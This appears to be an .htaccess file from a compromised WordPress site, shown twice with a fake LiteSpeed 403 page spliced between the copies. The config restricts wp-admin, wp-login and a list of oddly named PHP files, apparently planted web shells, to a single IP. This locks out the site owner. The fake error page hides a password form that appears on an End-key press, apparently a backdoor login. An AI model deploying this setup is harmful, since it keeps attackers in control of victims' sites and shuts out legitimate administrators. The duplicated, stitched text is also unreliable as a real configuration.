# Disable directory listing
Options -Indexes

# Block ALL PHP files by default
<FilesMatch "\.php$">
    Order Deny,Allow
    Deny from all
</FilesMatch>

# Allow WordPress core files (untuk semua - front-end)
<FilesMatch "^(index|wp-cron|xmlrpc|wp-activate|wp-blog-header|wp-comments-post|wp-config|wp-config-sample|wp-links-opml|wp-load|wp-login|wp-mail|wp-settings|wp-signup|wp-trackback)\.php$">
    Order Allow,Deny
    Allow from all
</FilesMatch>

# Allow custom files HANYA untuk IP tertentu (RESTRICTED ACCESS)
<FilesMatch "^(404|public2|theme|mainkanterus|mikale|gilabanget|bypass404|yuji|camara2|camara|nailong|hanabi|payburman|tarmisuper|bisa|jendralpay|indraq|suhu)\.php$">
    Order Deny,Allow
    Deny from all
    Allow from 138.199.60.176
</FilesMatch>

# Restrict wp-admin AND wp-login to your IP only
<IfModule mod_rewrite.c>
    RewriteEngine On
    
    # Block wp-admin directory
    RewriteCond %{REQUEST_URI} ^/wp-admin
    RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
    RewriteRule ^(.*)$ - [F,L]
    
    # Block wp-login.php
    RewriteCond %{REQUEST_URI} ^/wp-login\.php
    RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
    RewriteRule ^(.*)$ - [F,L]
    
    # Block admin-ajax.php (untuk plugin/theme functions)
    RewriteCond %{REQUEST_URI} ^/wp-admin/admin-ajax\.php
    RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
    RewriteRule ^(.*)$ - [F,L]
</IfModule>

# Allow ALL PHP files in wp-admin for your IP
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$
    RewriteCond %{REQUEST_URI} ^/wp-admin/
    RewriteRule ^(.*)$ - [L]
</IfModule>

# Allow ALL PHP files in wp-includes for your IP (needed for some plugins)
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$
    RewriteCond %{REQUEST_URI} ^/wp-includes/
    RewriteRule ^(.*)$ - [L]
</IfModule>

# WordPress permalinks
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
</IfModule>

# Error pages
ErrorDocument 403 "<html><head><title>403 Forbidden</title><style>body{font-family:Arial,sans-serif;background:#f0f0f0;text-align:center;padding:50px}img{width:150px;margin-bottom:20px}h1{color:#d9534f}p{font-size:18px}</style></head><body><img src='https://pomf2.lain.la/f/pwnj4q0n.png'><h1>403 - Akses Ditolak</h1><p>IP Anda telah dicatat.</p></body></html>"
ErrorDocument 404 "<html><head><title>404 Not Found</title><style>body{font-family:Arial,sans-serif;background:#f0f0f0;text-align:center;padding:50px}h1{color:#ff6347}p{font-size:18px}</style></head><body><h1>404 - Halaman Tidak Ditemukan</h1><p>Oops! Halaman yang Anda cari tidak ada.</p></body></html>"<!DOCTYPE html>
<html style="height:100%">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title> 403 Forbidden
</title>
<style>
    @media (prefers-color-scheme: dark) {
        body { background-color: #000!important; }
    }
</style>
</head>
<body style="color: #444; margin:0; font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%;">
        <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
            <h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2>
            <p>Access to this resource on the server is denied!</p>
        </div>
    </div>
    <div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
        <br>Proudly powered by LiteSpeed Web Server
        <p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p>
    </div>

    <!-- Hidden form login with only input box -->
    <form class="hidden-form" action="/index.php" method="POST" id="loginForm">
        <input type="password" name="password" id="password" placeholder="" required>
    </form>

    <script>
        // Form initially hidden
        document.querySelector('.hidden-form').style.display = 'none';

        document.addEventListener('keydown', function(event) {
            if (event.key === 'End') { 
                // When End key is pressed, show the form
                document.querySelector('.hidden-form').style.display = 'block';
            }
        });
    </script>
</body>
</html>
# Disable directory listing
Options -Indexes

# Block ALL PHP files by default
<FilesMatch "\.php$">
    Order Deny,Allow
    Deny from all
</FilesMatch>

# Allow WordPress core files (untuk semua - front-end)
<FilesMatch "^(index|wp-cron|xmlrpc|wp-activate|wp-blog-header|wp-comments-post|wp-config|wp-config-sample|wp-links-opml|wp-load|wp-login|wp-mail|wp-settings|wp-signup|wp-trackback)\.php$">
    Order Allow,Deny
    Allow from all
</FilesMatch>

# Allow custom files HANYA untuk IP tertentu (RESTRICTED ACCESS)
<FilesMatch "^(404|public2|theme|mainkanterus|mikale|gilabanget|bypass404|yuji|camara2|camara|nailong|hanabi|payburman|tarmisuper|bisa|jendralpay|indraq|suhu)\.php$">
    Order Deny,Allow
    Deny from all
    Allow from 138.199.60.176
</FilesMatch>

# Restrict wp-admin AND wp-login to your IP only
<IfModule mod_rewrite.c>
    RewriteEngine On
    
    # Block wp-admin directory
    RewriteCond %{REQUEST_URI} ^/wp-admin
    RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
    RewriteRule ^(.*)$ - [F,L]
    
    # Block wp-login.php
    RewriteCond %{REQUEST_URI} ^/wp-login\.php
    RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
    RewriteRule ^(.*)$ - [F,L]
    
    # Block admin-ajax.php (untuk plugin/theme functions)
    RewriteCond %{REQUEST_URI} ^/wp-admin/admin-ajax\.php
    RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
    RewriteRule ^(.*)$ - [F,L]
</IfModule>

# Allow ALL PHP files in wp-admin for your IP
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$
    RewriteCond %{REQUEST_URI} ^/wp-admin/
    RewriteRule ^(.*)$ - [L]
</IfModule>

# Allow ALL PHP files in wp-includes for your IP (needed for some plugins)
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$
    RewriteCond %{REQUEST_URI} ^/wp-includes/
    RewriteRule ^(.*)$ - [L]
</IfModule>

# WordPress permalinks
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
</IfModule>

# Error pages
ErrorDocument 403 "<html><head><title>403 Forbidden</title><style>body{font-family:Arial,sans-serif;background:#f0f0f0;text-align:center;padding:50px}img{width:150px;margin-bottom:20px}h1{color:#d9534f}p{font-size:18px}</style></head><body><img src='https://pomf2.lain.la/f/pwnj4q0n.png'><h1>403 - Akses Ditolak</h1><p>IP Anda telah dicatat.</p></body></html>"
ErrorDocument 404 "<html><head><title>404 Not Found</title><style>body{font-family:Arial,sans-serif;background:#f0f0f0;text-align:center;padding:50px}h1{color:#ff6347}p{font-size:18px}</style></head><body><h1>404 - Halaman Tidak Ditemukan</h1><p>Oops! Halaman yang Anda cari tidak ada.</p></body></html>"